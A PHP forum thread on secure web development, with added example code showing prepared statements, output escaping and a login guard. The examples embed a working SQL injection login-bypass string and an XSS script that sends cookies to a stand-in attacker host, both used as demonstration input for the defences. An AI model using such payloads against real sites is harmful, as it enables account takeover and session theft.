Thread: Secure Application

#1 Thread Starter (Addicted Member, Osaka, joined Jan 2006, 200 posts)

    Secure Application

What are the best guidelines to follow for developing a secure web application in PHP?
Thank you.

#2 CornedBee (Kitten, "In a microchip!", joined Aug 2001, 11,594 posts)

    Re: Secure Application

    The primary guideline is simple: check all user input. Never let anything unchecked slip into database queries or output. Never use string concatenation to build queries; use prepared queries instead. (PEAR::DB emulates them for drivers that don't have native support, like the old MySQL. As does PDO.) Never directly output anything coming from the user; always at least escape it with htmlentities().
    The SQL thing protects you against SQL injection, which compromises the security of your data. The output thing protects you against XSS attacks, which compromise the authenticity of your site's actions and can be used to leak session cookies, passwords, etc.

Beyond that, make sure the site only accepts requests over HTTPS and get a properly signed certificate. Have a proper login system: make sure nothing can be reached without proper authorization. The security of accounts is, in the end, a matter for the users. You can reject really bad passwords, but you can't prevent the user from writing one down and leaving it where others can find it.

    That's all there is to it, really. It's mostly a matter of being careful, not forgetting anything. A single unchecked query is often enough.
    All the buzzt
    CornedBee

    "Writing specifications is like writing a novel. Writing code is like writing poetry."
    - Anonymous, published by Raymond Chen

    Don't PM me with your problems, I scan most of the forums daily. If you do PM me, I will not answer your question.
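The two rules from the post above, shown side by side in working code. This is an added example, not code from the thread: it builds a throwaway SQLite database through PDO so it runs offline, and the table, rows and the attacker's input are all constructed for the demonstration.

```php
<?php
// Added example (not from the thread): the concatenated query the post warns
// against, next to the prepared-statement version, run against an in-memory
// SQLite database so it works offline. Table, rows and the attacker's input
// are constructed for this demonstration.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)');
$pdo->exec("INSERT INTO users (name, password) VALUES ('alice', 'correct horse'), ('bob', 'hunter2')");

// Unsafe: user input is pasted straight into the SQL text.
function loginConcat(PDO $pdo, string $name, string $password): array
{
    $sql = "SELECT name FROM users WHERE name = '$name' AND password = '$password'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Safe: the SQL text is fixed; values travel separately as bound parameters,
// so they can never change the structure of the statement.
function loginPrepared(PDO $pdo, string $name, string $password): array
{
    $stmt = $pdo->prepare('SELECT name FROM users WHERE name = :name AND password = :password');
    $stmt->execute([':name' => $name, ':password' => $password]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Classic payload: closes the string literal, adds an always-true condition,
// and comments out the password check. Constructed input for the demo.
$attackerName     = "alice' OR '1'='1' --";
$attackerPassword = 'anything';

// With concatenation every user row comes back: the password check is gone.
echo "Concatenated: ", implode(',', loginConcat($pdo, $attackerName, $attackerPassword)), "\n";
// With a prepared query the payload is just a name nobody has: no rows.
echo "Prepared:     ", implode(',', loginPrepared($pdo, $attackerName, $attackerPassword)), "\n";

// Output side: never echo user-controlled text raw. htmlentities() turns the
// characters that would open a tag or break out of an attribute into entities.
// ENT_QUOTES also covers single quotes, which matters inside attributes.
function safeEcho(string $userText): string
{
    return htmlentities($userText, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// A comment field as an attacker would fill it in (constructed).
$comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>';
echo safeEcho($comment), "\n";   // rendered as text, not executed by the browser
```

Run it with `php example.php`. The point to take away is the shape of the two login functions: in the safe one the SQL string never contains anything the user typed, so there is nothing to escape and nothing to forget.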

#3 Thread Starter (Addicted Member, Osaka, joined Jan 2006, 200 posts)

    Re: Secure Application

How do I make sure that no request to a page gets through without proper authentication?

#4 CornedBee (Kitten, "In a microchip!", joined Aug 2001, 11,594 posts)

    Re: Secure Application

    Before doing anything else on a page, check that there is a valid user logged in and with the necessary privileges (e.g. user administration requires admin privileges).

    Login systems have been discussed a few times here, so searching the forum should turn up a few useful threads.
    All the buzzt
    CornedBee

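One way to implement the "check before doing anything else" advice from the post above, as an added example that is not code from the thread or from any forum login thread it refers to. The session layout (`$_SESSION['user_id']`, `$_SESSION['role']`), the role names and the `/login.php` path are assumptions for this demo.

```php
<?php
// Added example (not from the thread): an authorization guard meant to be the
// first statement every protected page executes. Session keys, role names and
// the login URL are assumptions for this demonstration.
declare(strict_types=1);

// Returns null when the session holds an authorized user, otherwise the reason
// the request must be rejected. Kept free of side effects so it can be
// exercised from the command line without a web server.
function authorizationFailure(array $session, ?string $requiredRole = null): ?string
{
    if (empty($session['user_id'])) {
        return 'not logged in';
    }
    if ($requiredRole !== null && ($session['role'] ?? '') !== $requiredRole) {
        return "requires role '$requiredRole'";
    }
    return null;
}

// Drop-in guard: call at the very top of a page, before any output or query.
// Unauthenticated requests are sent to the login page; the wrong role gets a
// 403. Either way the script exits, so nothing below the guard ever runs.
function requireUser(?string $requiredRole = null): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $failure = authorizationFailure($_SESSION, $requiredRole);
    if ($failure === null) {
        return;
    }
    if ($failure === 'not logged in') {
        header('Location: /login.php', true, 303);
    } else {
        http_response_code(403);
    }
    exit; // never fall through into the page body after a redirect or 403
}

// Typical use on an admin-only page (hypothetical file names):
//   require 'auth.php';
//   requireUser('admin');
//   ... the rest of the page ...

// Command-line demonstration against constructed sessions.
if (PHP_SAPI === 'cli') {
    $cases = [
        'anonymous'     => [],
        'ordinary user' => ['user_id' => 7, 'role' => 'user'],
        'administrator' => ['user_id' => 1, 'role' => 'admin'],
    ];
    foreach ($cases as $label => $session) {
        $result = authorizationFailure($session, 'admin') ?? 'allowed';
        printf("%-14s -> %s\n", $label, $result);
    }
}
```

The `exit` after `header()` is the part people forget: a redirect header by itself does not stop PHP from running the rest of the page, so a client that ignores the redirect still receives the protected content.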
